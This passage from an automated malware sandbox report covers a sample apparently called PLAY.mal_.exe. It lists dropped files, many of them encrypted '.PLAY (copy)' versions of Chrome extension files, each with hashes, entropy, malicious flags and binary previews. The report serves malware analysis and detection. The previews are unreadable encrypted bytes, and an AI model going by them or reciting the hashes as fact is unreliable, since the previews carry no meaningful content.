        Preview:T...@...%...@.7.@.t9....%.].[..\.>S....Q..$....?..X.r....q5.....R.S....~q.("Z...|..n..c*.2.........Q8.U..V.[........5.._<..*.....Xk..........Yq........1.B,.....V.9A..#.Q..........t...e.W.[...1..O...".<.N._...w...#."C....[.....T.7u.1T.8..nR......]G..%......>g=b.3[...3V~.;P......1.8..#.^1B.V..;`W...Q.8..bO%...N..;M...wi...X.5>i.......s.....R..q.`.b.. cJYT..n4;.....72..X...V..e.e......[.9*MG.&.L.h.a~d..i.~.............<..`...QK.7...........N.$q.QO.<z.B..]...*t....~fD..p...|.v@..v.v....3..\.T(s-.X..o6/...R:.[#--...[..H.......Q_.R.Z#.../..&...eqk.<..i";x...YY..+.L{k..x...m..3@..$......b7V.....E..pP......r..y....+..;d.....T0S-[..+...t.. ._D..wI..;.$@.Q.-.J....".t...e..2.R.E.Lr>w.P.3.$n.|*q......i$.#..'...t.Z^..a.....o..+..Q.S.?l.........e....,>....x./HX..KT)O..o=...c...*.rS...e..y..]]..=H.B..(......BVMr.S..Nn*.].....i8A.r.}.f...s+......(|.G7n.....p...X..E>...ww..\. .j*>n...s.!......7Jp....v..c..V,....l.[....X.\...Y.3I...1.X.1b.Xx.N(1....

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\dasherSettingSchema.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1928
        Entropy (8bit):7.909292335008815
        Encrypted:false
        SSDEEP:
        MD5:8C52FE9B3C2CB1F1133DA35AABE3E4E3
        SHA1:3C960098BB6057BFF72342B88BCED602A8D89153
        SHA-256:B8920D3090351EE889E176DCE4581D4B0806016C52FAD8EAAC9AF515BF149A1E
        SHA-512:EED57EB8FC26EDC609D807A9BBC12341E6344E39F07C609C702453C37969815B3DC5543B03649EE3B176F82D465B7E5E00A256721A087CB03FB9BC79EE22940B
        Malicious:false
        Preview:l4.K.VZ2....7..=4..)s.uj...N.....j".7;oO..y.k.E.G%.^....S..3{..]`.l.?.G=.g........'.s.e9......O..!gY.\...}..+MRa...m.ql....:...o.s.kU.'.NK...2.5..A .....'..U.\.1..[.3.a^P.r*....`*...C-%.[.h..c....C9[.V.(.d&...]..{.+.qtx.+.f..X.'I&...e.4N..!.^......zC... .T.=_.K....u.X..f...i......9.$RAI....%HM}..\.....[..a?o.9`m...9...sH\...L.^..}../..i...O.\.m...t#{.{/`Y..mg.#.r;E,.X.n...5)\3m.......C.d..}#..,..T.E..*.(.h...>..c....)G.u....d(.h.3.X .....].v..X..h@b...~...L.ap.T\...'.V7...6A.t.....N...:).}.FV.....R......[..f^F......!......VK-.yG.$.....a.......T_..R,....r.....?..X.67.I.......l.".....u....I..7%o....r.6....-)..L@.Z$......&E.U......C`..*N.....Kh..t...,3.............gVi.&.k.|t. ..kae..\.~{D..9=....*2....P..)...."..}.-...&......m...I...cQs......:]...?...gw^.\.Ug...f....x....h.[(.O....7y.y.Z.....m.eOvIVLp._...T..U.|.!.I>..........................R:.W.N.. ...-.\o.Hi.l..M..t....o.1..17..:...._/NH.].,.!.g.8.D.jM..T...v......aXJ..3...>...\.

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\eventpage_bin_prod.js.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):68872
        Entropy (8bit):7.997551546828867
        Encrypted:true
        SSDEEP:
        MD5:9CAE7742980FB39EDE675EDE438F2FB7
        SHA1:82A808402A886CEF8A65132721A077A1B9A104FE
        SHA-256:ED992112E9933282BA6D8397D415A537A6E9677A187BAC6C9E59296B9244C4D9
        SHA-512:E06691C6F7139762F8F13B7358D23DA753DAC1F64427754ECE0106CCD656B59553E11600589C96956B848A92C7D66FEDA3F4A93A32482F0DD9626194C5326771
        Malicious:true
        Preview:8P.y.oK..6&hE:....Z..u~.Rr.h.X0....,..V.... ..h.7b*.4..{.&... ......<!.S...syo5....r5....D^.P!..@..c-B-..w....o.0...H{..8|...P....k.ts..e..K.....}.X\...P......g`..y.....O...../.,)T(...."....|S`....^.&...}....wM....I..\C.;s...8.U.......A.......MZ1..F~...WA.qN..=.O.e.9@M..>V.....FS..........[..~...U..Y.9Q.O{..bG..*hP..V...%L",z.N.+b}...N_.^w.~.O...~v.7...h.....t.;.G_l..<K....^!...P.s.!..5.3P.).0....-.f...7...!`.Z..m...V....P..!.R...W..........~l..i.r.g..q...R.jnq.d)...|N|..%..#].n"`#3..J.O#*..OW../.....kI?".!....G..S'....i.Db.zS.SMj.I...i.gP.S5.p..]...@...~....u.X`BK.../.h..0.N.`....*.#.0FI.*.{.z......D.i..hi_4^..1U..u...T...J....y.3....&..f.F. .....D2A.".F.6E..a.#x^..(s...]y.....u.z.....0.:$.pw_...{l.....!5..mx:......b..H..CE..|...^..1..u....H.]8t.lj....D....O..)..b....M......'...#Qv..A..A...f7....ow.k.4.].E.v ..(.@..2....4^.S......A5.?..Q.........#.T{.|\$`.....,GH.H..2......xUR..zY.L.A..[..7w...tBs..k.............+,.)..]cd.1....0&7..

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\manifest.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2600
        Entropy (8bit):7.933759660805361
        Encrypted:false
        SSDEEP:
        MD5:D420564A9A2A80EFB53FA81E1E278816
        SHA1:A63413812072C46873B87E8B21B3153A0C912BE7
        SHA-256:EC6920BF72D01047AD51F367BC9295742D29FF0748C83CE3534CF4B558DF583C
        SHA-512:6D42AD752F27C68FCF48656B56A509ADEBB427C51863562DC8A41EEE2FFD5635A8D5B9E0A650684F9C0A819CACA0ED8AEB01545E579C0367F228CBAB658D5624
        Malicious:false
        Preview:..g..S.MzA.o[B......b.O.=.....M&..\m_..F..l...OK.!."...I..6,..3.._..x.IM....T.....@..r...9]:..k,.T.M.;2O}\.w...+......~....B.2.o..v7).=E...D-..M....p"..N...F.R..{@`..X3x....^.{._v.L......`k<.YgH.#.4.Y.Y_A~L..;.*n.MTu.....o/..rq0.w.8:.+.Bb.6.....:.h.U....Z..!!}..t.../w.d..b.n._..:........2F..N.b;..R.\Ia......?w...Z....3.(f........i[O.$Y2..FP\..u(..!.....i......k.K.j...J.o.?S.#..).T..2.jUXr..%^.......|..+>M..\...$....R.("B.z.-n......h.q..6...........o.^Q.K.CK....z.I.|.Q>.}.%...s9..k.7\...b..TRi.Y..."..Xuo.....?5....R.hO..=........X:..hk^.m..1X.4.......,..N;..U;3..{\....9..JB...E.........c......C.U.A$........df..........y...B..jP=.]f\@.w...n'...=G.......>&HL6:I...ch.....1....P.!<........W.....G............;.'.Ed..`.t.!9+'b.L--...7......yO..|.../...".q..... .3.,.......G.H.U/n..{..LJ.W...1..a{..,.O..jl. 45(.......<.\..f.<...2.....\.6.*...D..LAh...H....8.x....BG...[.r..b.....zF.....u..P.N..\.>=/{.$.n!.x.]...<nve7A...zNc..C.....tI%v.f

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\page_embed_script.js.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1320
        Entropy (8bit):7.847279568069187
        Encrypted:false
        SSDEEP:
        MD5:AAE08AF6AFC76BD5CB5BC4A71218FD5C
        SHA1:383B4189B3E5C64F23E1D11B7368205581C25323
        SHA-256:EAF2654B2DA1793DCED0502C8F1ED59660E13A0A454651F362881BE460CAB073
        SHA-512:203D94269CC4134F6F187507DE59F116C7E6EA291A1857CFEE26985C8D95D84787E4949E81A241D5E8D24FA2513AACB22E0892D30A6C90B5AC015D5D2DA427D8
        Malicious:false
        Preview:.|^........*.1e.....H.yiV.RB.........d...7$(.W..7...]......4+.2+]._?.A.\;I2.l........nnU5.y;y......wD..[..k.....Jz.;[...".Ko...N./1.<.l.;.p....D..<.{....(z.v...-.".........n.:....Y..r....f.%c......w.J8c.c..f.aU......._7..]..n...2...!#.....x...T..U.|.!.I>..........................#m..I....C...`s.@...q:.*.v8.L....,....L.L.E..\.<.C....Q....q.".]\.!..-. .. .D....._%...3S..J..r.v.1..h...@!.8.Q...4......I..&...kXf...Y..s....9."..X.KT._/:(.V.B._i.......`.aL...#v5-$.. .....b.A......}q0f#.-.u.m.a.x4.F...W.]..!....W...$.y......aO....bq.=.rt...>.Gt....*eJ..eJP..d.........kc...y&.........n......(.J.DB...q.H.5..;...<c~.`.d.,.....3....# ....3..p..=.......l.y.....d6../..2.;(W.6LC...8m........o...{W...c...P.....z.*..BB...{.-&e@W.>_.gc.Y.(.}.m7..x.`f.!....8...R..D.x.D.Hr..u....f5s8T"......v.6.eO.#.ed?....k..U+`....*%.Z..V;.9.W*...kf.Xt...9..V.J8L.z..qb...!]..Q...YT..Hx......z.~h.^af.uR...E..(...M..w...J60..4..m.u..~k<~...%. ...w`$#.*.P'......{.. .....

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_background.js.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):545720
        Entropy (8bit):7.99966238657806
        Encrypted:true
        SSDEEP:
        MD5:5A3B814FE6962A2028C1D26A50340EAA
        SHA1:4A33371D8C1CB656732699591712E25D97C4161C
        SHA-256:10D3E0257D2FC1DD6FA7DDEBC1BF194E03CE1AE49A62AAD2A8B8525216484721
        SHA-512:82531B281D5B45F3CE13ED92B4154D2C68761CFD3091949DE92092E64C60D2F62D8DE5F97FB6D69A08AB94795116D3C1E4AE5369F38748414893165CD6FB0A21
        Malicious:true
        Preview:..(.D./.........D.t..JC.u.U.@...3 ... r.....Y .....k.@<w.......@.^+.G..(w...Y./....?H....L.._....<.....$HF......e9..P..f.......,&_.]>..3...B`..H^.GM.wQ....1.{:|Ib...S.O....J.".n*.J..)....h./.#...!. ..}.Nn..@4....\.[d..6..0..a.Yj.f ....q|..K....>.Z....c@a)...Z.p.s....3.h....-....R.h0....2.._O.....;]lG7\#\u.........Y'M1c....}O..........[5..g..D..Y.f5..n...;DP...1K.no.e2..]q.O.A...d1.%..HM.....X.).l....*!e.Y7....9.N.0.. ..-..6....~..nQ#Y...Z.a.......;..]2;..rt'[....w.?..;.<......&...S..d..{......{.9..1....#Z]...1Ve...EY..W|.b,.......<..F...b....t.O..|.w*.p....y:+...x...t..+.L....uJ.(..1Gl....&..b..L0o..cH......N...".!+.q+..K..ov.....!..X.-..F.pPe..`<..JU .....&..'.n....(.h...P.p......R4.....\.){..`".4.:........!.%...2....{.hw.&.R..&...U...+$..I.....ba.!.....S......K.....4R.i..............BN..a0...{...........S..=.@.....Q..).u....]T]...[.J......|'...An.....W8..L....9.a.!.D.........{...,..{...6.W=.x.....a..S...K)K.....?.#..(.....[.~.

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_window.js.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):262392
        Entropy (8bit):7.999348383049163
        Encrypted:true
        SSDEEP:
        MD5:91E55FDCFAEC2CB598DC7111A5FB2442
        SHA1:9B1609BCAF1186AE015C3238133D2B8237BBEEC7
        SHA-256:4E94E77D5C9F319BD371A03F7FC892EBC58B154E163AB1BB2B5D47E98D6001F3
        SHA-512:0FE360678B126155D5DF690C1E2C87F4FF2FA5DDE049572565E726D79E018F4281A4E0C66D2540ED738FFA0005938B37B5E7692FC264EF76CD880D912DC01A1D
        Malicious:true
        Preview:P.(....GC$E:.......r.e.i.....,z5..zM$..0P[...H.l.Z.6|.^......E.Ag.hf..Z.B.Jr.V@........K.....&..z.".K..6....&..-...'. -....g......7._.`.?..A.....)...W.".<K@...5.......AC.9d..3:OV.Nf.\2...n......J.u.9..9...W.<L%.^..?...O..-.I...1.....0V.....i.e*...e.4 ..B.q.{..]...Fyq.......C'...UfRkv`b.H2..j.q....Y...k....;Tk..@..(..V.H..H.zX....K...w../o.@B....h%.....U...#.m<P;....Y$2...j?.....4...?.S...5;RJ5>.vW.b..........Z.M......2 l.,.X {.X..L...rS.....`.dV.`ue.2...MU(A.tJS.C......S.S..M.b.-Y.F............X.t0+..E..\.Q...*..wC..#...|..4.........S...H.......Z1..i..'..).Cg|$.$..=::...k.".k...1@....T....X..9fv..eas..i.N..{4......_>c!......8R..{..N=.<.eb....Ox?z.B.`...}.&. &...i._Q.....?.%.}.vIk.E'G....@........M..........w..'Cq"|.O}!...~...!..a ..>.Ss..Q f.g{..>.3.%../-.!..2..^U...h>Z...$.......Co....M_Y_w .;.ukG..=.>..`......:e..3h....o.aRI ....X....?`....=..,..}.....1Tl.EpZ.S.[.'O.E..${.C.*......kg%........8..H..WN...E..h.d.6...4.V.h.OH...|.

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\craw_window.css.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2808
        Entropy (8bit):7.918428618582969
        Encrypted:false
        SSDEEP:
        MD5:CE7038D932DB3C697B70515FBFCB1AEC
        SHA1:9F471B3B8F422FE75FCD5E300F231828938F8EEC
        SHA-256:FCDD58F32B7468712631FBA0FF76C0DBDE25E7676F51DE41CD833B48A13DD22A
        SHA-512:5039C0DF362C729CAD91635DE2046E830E295761CBB44CF216C4747C306CABA14962CE44F1D7DAACABC0B7F822458A832AC20A6B8D2CFCED999FEE0ABA516B4C
        Malicious:false
        Preview:;.h..>.....j+K(..9GI...4v.-...b..y+....t.8../;..P.[...6g..L8..K[5...ru.X...b..E.{].....c.U...=..B....[.y-4........W.K........l...6......;./w.c...0....o.......a$O.G:'.K.3.\....uC.^8..;.O.....&s.qx...u[..w]ej.).R3X.6......8.22./.1.~.y......&.....Q{Xy 1,P....Q.....o.}.i!..N.........$... ......l..........sd..^...".=;R..M~.K./&9U.K..;.v.g86...LM.=..k..V.nW.A.<.GU^Y...`...TE...I.\.y.p.....-`....P.x6.jR.Q..3c...D...{...o...{W(t........".1..(.-...R.M..2x..}.M.-..i...4../.$.e.N\u7.V.R.fsvM8.......2k.{`.H..:.d......P...z.z.$g...w....\...j...uy;...W..ez9.RB.9..*..G..PV.8..k....WpJ.sQS-4_....~....;..w.`.p*....).ty.._.`>:.3....A .|N,..5o.6......F...A...s......j..,...':.....HI.....-B.-.t..: .*.MB..)^E.#>.9..kD.../......._ao/....1>...R..lW|....e....l9~..6.....b..K.....s5..4....B.y..._._._..CFUM.z....~.v.....y.M...{..#..yP.;.RUM.a...}.#`...s*....?)UO....S"J.U....d..^.......[.!6..L.e.........<9.f_H.4D.....@..kIcWm...,.u...N6.....DH.T.@.!'Uy..

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\craw_window.html.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1880
        Entropy (8bit):7.8974519227719355
        Encrypted:false
        SSDEEP:
        MD5:C7F2B9E20959BB9A90C063C1EC0BFA64
        SHA1:E716FD53F6F94968538DA85DFE40FF86CBAB8E21
        SHA-256:8B7F00C8DDEA1CD3ABFB5E7C634BC74B63BA74D5BB4957806817C0F9FC5891F7
        SHA-512:3AC920F97144502D61B4B5755EDB8BC90BC43FD96824E102FDAB81C24E119BEC78BAE9DE331CA767256AB2532CCF1B1AFBB6CF25D2A757E1C78EE1D9E11900DB
        Malicious:false
        Preview:m.C......?0....h.......6'....>.nN...5.Q....,..B.._.r}../.A....e......S....i......\M^).lHD4.W.]..@.....j..?.M.%}lXT....;......~KBvY.v..i.6.7.N.<..q.`..TW..DIO..va......x..n\....`v.z...l?0....vwz..%fm.CJ..-l.v..]."lX@t[..z.2...9.h.`1"L.+....X.F=...*..}..%..N?..}.....YO...=.. .#J.Z%^23..>....b..I....0{.e.P.u.x....rJ...2...ln2.Qv%...I&..iq'.........9P.4...ck..+....%S.;.....H..1..ks@).H.XQ.h`....Z#z....-.iH...H...(.,(.#..+....i..(..s..y.m....r.8Q.p.].....O....2q..@Ud.=..B.Tc..';eG?F..#....P5.p...mVy~.......]._.....S.My....8'..w;.t....E. ..p=b.N*.d....}..f...Ca<1..........d.?.%I=.r.Pw../...g...:........f...nyN.~2.+.N.".`....e....e2..z{.r.n'..-..1!;&5.@?...I...=..nc.w..8...H..K.n._.w.n-im...G..l.W.(i..K.....X...(1p..h..o_.V..R#...d..T..;&..q6...>.f...\...0.....(.z.2....}.b...T..U.|.!.I>..........................d....T.....'..^.r.....{......G.<.#..B..u'..M$.)..Yav.0.ZQbz..6..KD;G...Ww.....o._.....TS$..i...PU..>........o6#.3.9..Q`q...}t.J...7.

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):71432
        Entropy (8bit):7.997232320374958
        Encrypted:true
        SSDEEP:
        MD5:E245D1BD71556BAB7F7119A21F7C3DDC
        SHA1:38ACA64B99B4DB9F3A05A9E31814477F816C3C78
        SHA-256:0CF4980DE0A6103F9CDEAC7B0C95FBF8D019A7C8A3B683C529BBC2ACD6648EAD
        SHA-512:6CB16C011FEFB6EC7CA01174F5E9EFA820868CB1569833EF595401DF628DE4E1CE86F722CD9D074EC60D6C1777CF6CF8F45D5C686B497C98F837565ED3B6CB97
        Malicious:true
        Preview:..I.k&...+JH...S.@...5Ns%4pi0W...cN.......5T.\.....S&.......9.Y...D....!."|..."r..........x#...Q.y0>...i.tz 0..}.#..ipk.S........aV.....&"....&$T.........ml......x...<.2`.,..D.f..9...N.....^.I.....Y...#...Y....^yw3.a....p...M.'.......^lU.`..J.D..S./.'\ngVR4.07........U.j.X6{E.?.3. ...=4.R..yMa...0.y.........b.?jh..jh.3&...(.~Y..c[s.Q82..lEw/;.N........E.N...Y.Z.HW|n....x...MfJ,.V.(.......P.1.(................w...#...R.......8.............<Iu..C.M.._..g..q...F...D.Q.L..T[...8c|.nrA.......F..Rp...D.O.2E(LJ.@.q.2.ic....?.....e...p.R.Jq....E..SD.[GI...}..F..y..T..........KG..Y.=JYS....g.N....a'....l.._...j.`".;.Jw.O...'....~.0X..G.rX:..+']@...p(9..JG,.4e...*.O.-...p......1G.MQC'u..,.vG..7.h..p.0..[...V.i..G}.L..Q....r.........{h.nv.z._.|tmpy..^..Z.>G.....o?..~'.J....s..3t.6.M^..JvP....Z).K....:3N.|.D0$f....Vb~j.l.X{;.._.$%..P....FC.+.):..~..tJ^....26.k....[.#.F..~.........Y....@}u...Xh4M}._lF...{.E....~9RK@.j;.P.^...d.....\.(...p..k..._....

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\icon_16.png.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1624
        Entropy (8bit):7.878156880817832
        Encrypted:false
        SSDEEP:
        MD5:AA9F691905003201687874A8492896F2
        SHA1:14F9B20C5709317E8C8D81FC2EE588264184201A
        SHA-256:137C615F98119490B4B02E3FD7FCA2A99FF8A9A1A7BA79764923B43A4B9B1DFD
        SHA-512:198854476E5DF1CA7CB35C7602D1C8BFA06B77BB6C58B2513525E4DDBD1BF8AAB8A51491F978D8505F8DD41724883387DC01447901124EFA906D57F946238D48
        Malicious:false
        Preview:fc.....t?..h.1v}.;.6...p.6..".b\}....Y>'..s..i..?.F.HR~.....X..V._S.B'A?h.........itA..Q.b.wEY..N...o..<,...>.b}.....C.k.S.u.....J......t..S8.....L\;.....W..:<(:..d..w..bU.l.._Y..3..V..+.`,i3.~_.3$.....ch.+...YJ...K...R.C...Y...9E....Z..M....o..s5+.G..`%...G.l....<......@..06..............%M..LD...E...V.Q{f.h.........x...J.........[...?.5..../.Fi."..$.#ZD..0rY..ue>.%...Y...ePc../.|.G.P5..'.0Y....o"E.a.Y.83*....5.k-......fb.4...{|.<.........\f.B.PB.. ..(8xH:...O....%...z}...o..P.dq...n*.....po~.C....(!.o;..{6..:..o.... R6z..q...T..U.|.!.I>..........................9.I.ab...#Wy...M...`}z....9.0.......*....:)n.....V.y.\.b;p..qZ.u.G.k..9.\[.|+.F.....V..xC..bT<.6..a..P.*>..5.X|...}.&8.".Z7.`.........(.$..;...l..Qm.4.OB.J.&..Y....i....Pa$...k..Tf....1T1..........Y...3....Y.....I.ui...x........+.o\[.$..."...[..ve....j.4uDA.y|.`..Q..gd6?.e..0D.-K^...w.....lh.Y7...Qw.C&...+./K..Qy..xJ.N.6...Ty."...BrFXb..=e9.2..XK.v.l......{3.~R..R....t8.S....m...

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000008.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1128
        Entropy (8bit):7.795985423862453
        Encrypted:false
        SSDEEP:
        MD5:43B6F4A6F900B696A4603E265900B380
        SHA1:B08472CDF3136D965EC3C4C76625159579AE6688
        SHA-256:1C963445BCBD1C16C80C56EFCBE6A713E2436F63F567DAF6F82AFBDD37E3DE63
        SHA-512:9A1917AE7373EEA669BD891E6CF2BF825E9F0198A7E003ADB595D24253AEEC58E85371121D326AD940362E42C84948212DF5E0F573F6E56F7FD2326F659A7476
        Malicious:false
        Preview:A;'.X........0.......!.......I..5.N......s...i....?h.@...Dt.Z...T..U.|.!.I>.............................o(....,V..r.l8.?..k......2........1.e+?.2...gmZ..'.....[Dz...g.FU.W.c.?..._..6..z?...y.m.....P.e...a`..XN.]...............}._x6h..(.d........l~....1....bj.v2[KW..*.S...VW.ALTH}.k..k....$8m.A.8.i...NV_.x..].........:..c.....C..sv;.....}...g.......T.A.PR.......\......._/..j.....YvYc.Y...\s..%."..XM..<.e...........m.1B......q.j..+..n75f.svF~.lS......f...S......I#$....0*......g.....V@F.....t..g*91..u.3......Z.....<..c#.+..O....-a."..]o(....R.\..3.:......x.....a..]Or.D..oz.s(~=..d.-v2M.>.4.u....~l..6...-..."/.N....T.Fo5.>..0.L.V...].Oj.>.><....#Qgm.Q..6}Bn....z.....4......3..........0.Eq..JN.... !.c?..@.U..1+.c..Us..oo....._.#...u3a.g...z..$..=v>:.*.`BFIT.,..k.....X.H......%(.cJ...O.....f.$..).9&...:.vVWU...-....}.j.$l6..T",.q.&.|r.l.6...2....G....1Qf...x....{.H..fG...#.qh..z.v...0.1..Lj,...(..g..}.o..j.+....X............0.A.E..m

        C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901220034.msp

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):244417608
        Entropy (8bit):6.925652381378844
        Encrypted:false
        SSDEEP:
        MD5:076F673285A4A8285093979F3C81C3AA
        SHA1:860B78F1ACAC5D8B3749AA059346D6ED21456B74
        SHA-256:2C49C4F446D0641459666711FA45C72E6DF9F4CF609D37455665EDFE3ECF696C
        SHA-512:8C4EB3276F9632AC269B7EFCCD60FEC1A4667284377DF07CDB0CDA1A43B97C3337490A8A1965D1FD6E52C38B3105EB412BE8667C556E3AE5AE8915AF68DE4BC7
        Malicious:false
        Preview:..J....:.DWB.(,.s.\...0.<......VJ..&N..qS...<..)...tR.>]..Z...x..=/.b..R..V.H...I.l[Ey.b.....e.2.B.|.Ui...Pj...|..J.}.f....}c.........=....O....+[..n..2..k.*.h.2....g..=}.`.[...i.c.-....>....@e.5.....j.c..K....b.U..MF..v...c.d.....o.|...J\..!.g....W...lr.J..#.l...% .U.L.Gu..S....6.q...!P.oas.f...s>.}\S.'d...b.6.B.e..H^..=.Y...n.....W'..@.l.{....C..F..O)(.`..q.*...G..7....IT.Lk.U..cR.|..T^6=R.ho%.......J...!..;|):...'..}83.H.c..R.Cx=...=.yW....Q`.K..I....Ldn.M<.[.s.j..D..LOe.a....@...........$.z.9.ZixyZ3G4lf!...'Cui...hCQ....`N.k...{..w..&.T.Aj2k.*e.[....4.\..W.H..?.}...i..?.X..M..y.;..c...&..xW.7..%r..Z.b.......7..+......p...U.$.>>.".t..$...[.b..B ..TM.]...CT.tkp......^i..)..Y.%...Y.G..,8...{\...D0..Z..v.......t.8...........I..kn..J...G..R...V&,.......k.v.Z[.`..x........N..x...p..k..w.;.y%z.z..p....S....._..S..#.T..u.'.o.5W.Z..{..82.9..//_ehG.\.:.J..@.u...{.>.o^&.t.......2...w..oB..!.-........w9..r..d..+6......o.`z..2(.......#..3!

        C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):175115128
        Entropy (8bit):6.857424497239928
        Encrypted:false
        SSDEEP:
        MD5:A9EF01DE624FE631C70FF3207019C0D9
        SHA1:4C9882315D7A51190BE925658212E5FB86979FE9
        SHA-256:595B49F4E3853052987A117CD99C94F985EEBAACB8510346BE5FEFA2CCCD3F7A
        SHA-512:84DDB92FBFEEC786D5EF31E4A68B41E9F179D663EC92AD9AE13791212B2044733216151988A5F5BD184427D61B0C2A6AD71E5E21BA1F99DF7ABF55FE8E0E3F6F
        Malicious:false
